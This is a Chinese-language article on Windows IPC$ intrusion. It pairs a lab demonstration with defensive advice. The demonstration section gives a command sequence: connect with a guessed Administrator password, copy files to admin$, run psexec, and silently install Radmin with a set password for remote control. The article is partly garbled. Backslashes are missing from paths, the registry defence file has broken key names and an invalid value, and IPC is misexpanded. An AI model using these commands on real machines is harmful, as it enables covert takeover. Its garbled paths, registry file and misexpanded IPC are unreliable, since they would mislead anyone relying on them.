网络安全遵循木桶原理,即整个网络环境中网络安全的水平是由该网络中防护水平最弱的计算机所决定的。在单位内部网络中,大部分安全都是建立在基于“信任”的基础上,而没有采取安全防范方法,认为没有谁会进行破坏,没有谁会获取情报信息。在这种环境下,远程网络连接安全是一个不容忽视的安全问题,值得进行探讨。
什么是IPC
IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能。IPC是Windows的一个重要模块,网上邻居以及网络共享都是通过IPC来实现的。黑客或者入侵者利用IPC$共享来实现入侵。网络上也常常将利用IPC$来实现入侵,称为IPC$漏洞。IPC$连接分为IPC$空连接和带有一定权限IPC$连接,IPC$空连接没有任何权限,但是可以获取该主机的netbios信息;而带有权限的IPC$连接则可以执行命令和对文件进行复制、删除和修改等操作,从安全的角度来说,IPC$是一个存在安全隐患的因素。
IPC$入侵原理
IPC$入侵的最主要原理就是获取被入侵主机的密码,利用有权限的IPC$连接到主机并复制文件到主机上,然后运行木马程序或者执行命令来实现完全控制。如果系统默认共享全部打开,通过字典软件生成用户口令密码,再利用某些软件进行用户登录密码的暴力猜解,获取用户密码只是时间问题。因此网络远程连接(IPC)安全是网络安全中一个不容忽视的问题。
常见IPC漏洞攻击方法
1.利用IPC漏洞应具备的条件
(1)知道账号和口令,且账号的权限必须是System以上,本系统中使用是Administator权限。在绝大多数环境中,利用软件所扫描出来的弱口令一般都是管理员(Administrator)权限,如图1所示。
![]("/news/Chanel/images/1144638723.jpg")
(2)系统没有禁用远程IPC$连接
(3)能够扫描到对方计算机上所开放的445、135或者139端口
2.试验
(1)试验环境
◆ Windows 2000 Professional +SP4虚拟机
◆ 系统未安装杀毒软件和防火墙
◆ 目标机IP地址为192.168.1.4
◆ 远程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外还有其他的远程控制软件也可以使用。
(2)探测目标机开放端口
◆ 使用sfind工具。使用命令格式为sfind -p 192.168.1.4
◆ 使用NT自动攻击工具
(3)获取目标机管理员账号和密码
(4)执行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.* \192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec \192.168.1.4 cmd
通过命令行方式安装R_Server。直接在psexec中执行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
执行结果表示Radmin远程控制软件服务端安装成功,然后通过radmin客户端可以直接对该计算机实施远程控制。
安全防范方法
1.管理层次防范方法
在网络管理中常流行一句话“三分技术,七分管理”。其实在网络安全中也是“三分技术,七分管理”,安全重在管理。只有意识上的重视才能带来长久的安全。
(1)安全审计
密码的安全是整个网络安全中的一个重要因素,因此应从审计的角度加强管理,可以对系统是否安装杀毒软件、防火墙软件、安装系统补丁、系统设置密码等方面进行安全审计,并配置一个安全管理人员。
(2)安全知识培训
网络安全也是一门技术,它由很多知识构成。因此了解和实施需要一个过程,这个过程就是培训和教育。通过培训来提高安全意识和安全技能,通过知识和法律教育来普及计算安全知识和计算机犯罪方面的法律意识和责任,增强安全感和责任感。
2.技术层次防范方法
(1)查看网络连接情况
使用“netstat -an”查看本机与网络的连接情况。该命令可以查看目前所建立的连接,系统所开放的服务端口。
(2)查看IPC$连接情况
使用“net use”命令查看网络共享连接情况,如果显示结果是“清单是空的”则表示无IPC$连接。否则会显示连接的的详细信息。
(3)安装防火墙软件
(4)关闭掉缺省共享
关闭缺省共享有两种方式,一种是彻底的禁用共享,一种是开机后删除共享。
开机后删除共享,可以将如下代码复制到记事本,然后将其另存为delshare.bat文件,并将其添加到系统的启动中,这样系统启动后就会自动删除默认共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
彻底删除共享,可以直接将以下代码复制到文本文件,并保存为delshare.reg文件,然后自己双击该文件将其导入注册表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
(5)禁止Schedule服务
直接在“开始”-“运行”中输入“services.msc”,在服务控制面板中停止掉
本文通过对IPC$入侵方法的分析和研究,提出了技术层次和管理层次的防范。通过以上的分析,可以看出IPC的安全是一个不容忽视的安全问题,因此进行网络远程连接的安全防范是非常必须的。
